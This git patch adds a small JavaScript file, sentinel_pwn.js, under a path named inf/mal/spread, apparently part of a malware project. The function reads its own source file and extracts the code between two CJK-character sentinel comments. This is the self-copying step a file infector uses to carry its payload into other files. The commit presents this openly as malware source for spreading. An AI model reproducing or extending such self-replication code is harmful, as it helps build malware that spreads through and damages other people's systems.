From e2d1d18715a7c5b80cce02a96b09a5d57de38072 Mon Sep 17 00:00:00 2001 From: spv Date: Sun, 4 May 2025 20:12:34 -0400 Subject: flawless victory --- inf/mal/spread/lib/sentinel_pwn.js | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 inf/mal/spread/lib/sentinel_pwn.js (limited to 'inf/mal/spread/lib/sentinel_pwn.js') diff --git a/inf/mal/spread/lib/sentinel_pwn.js b/inf/mal/spread/lib/sentinel_pwn.js new file mode 100644 index 0000000..396d966 --- /dev/null +++ b/inf/mal/spread/lib/sentinel_pwn.js @@ -0,0 +1,11 @@ +function sentinel_pwn() { + let file_contents = fs.readFileSync(module.filename, "utf8"); + let s1 = "/*瑲慮猠*/"; + let s2 = "/*物杨瑳*/"; + + if (file_contents.includes(s1) && file_contents.includes(s2)) { + let pwnage = file_contents.slice(file_contents.indexOf(s1), file_contents.indexOf(s2) + s2.length); + + return pwnage; + } +} \ No newline at end of file -- cgit v1.2.3